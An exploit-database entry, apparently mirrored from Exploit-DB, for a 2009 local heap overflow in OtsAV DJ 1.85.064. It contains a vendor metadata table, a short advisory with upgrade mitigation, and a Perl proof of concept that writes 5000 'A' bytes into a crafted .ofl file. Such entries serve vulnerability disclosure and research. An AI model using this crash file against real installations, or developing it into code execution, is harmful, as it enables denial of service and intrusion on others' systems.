header-logo
Suggest Exploit
vendor:
OtsAV DJ
by:
HACK4LOVE
7,8
CVSS
HIGH
Heap Overflow
119
CWE
Product Name: OtsAV DJ
Affected Version From: 1.85.064
Affected Version To: 1.85.064
Patch Exists: YES
Related CWE: N/A
CPE: otsavdjtrialsetup.exe
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

OtsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC

A local heap overflow vulnerability exists in OtsAV DJ 1.85.064. By creating a specially crafted .ofl file, an attacker can cause a heap overflow, resulting in a denial of service or the execution of arbitrary code.

Mitigation:

Upgrade to the latest version of OtsAV DJ
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Found By :: HACK4LOVE
# all i want say welcom back 3asfh
# otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
# http://x.download.otszone.com/static/otsavdjtrialsetup.exe
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.OFL');
print myfile $crash;
########################################################################################

# milw0rm.com [2009-07-09]

Navigation

Suggest Exploit

Services By CQR